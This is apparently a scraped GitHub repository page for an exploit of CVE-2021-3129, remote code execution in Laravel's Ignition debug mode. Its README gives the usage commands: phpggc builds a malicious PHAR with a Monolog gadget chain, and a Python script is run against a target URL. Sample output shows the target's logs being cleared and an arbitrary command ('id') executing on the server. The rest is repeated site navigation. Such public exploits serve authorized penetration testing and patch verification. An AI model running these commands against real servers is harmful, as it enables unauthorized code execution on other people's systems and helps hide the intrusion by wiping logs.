laravel-exploits

Exploit for CVE-2021-3129 Details: https://www.ambionics.io/blog/laravel-debug-rce

Usage

$ php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system id 
$ ./laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar
Log file: /work/pentest/laravel/laravel/storage/logs/laravel.log
Logs cleared
Successfully converted to PHAR !
Phar deserialized
--------------------------
uid=1000(cf) gid=1000(cf) ...
--------------------------
Logs cleared

Name		Name	Last commit message	Last commit date
Latest commit History 3 Commits
README.md		README.md
laravel-ignition-rce.py		laravel-ignition-rce.py

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

README.md

laravel-ignition-rce.py

laravel-ignition-rce.py

Repository files navigation

laravel-exploits

Usage

About

Releases

Packages

Languages

ambionics/laravel-exploits

Folders and files

Latest commit

History

README.md

README.md

laravel-ignition-rce.py

laravel-ignition-rce.py

Repository files navigation

laravel-exploits

Usage

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages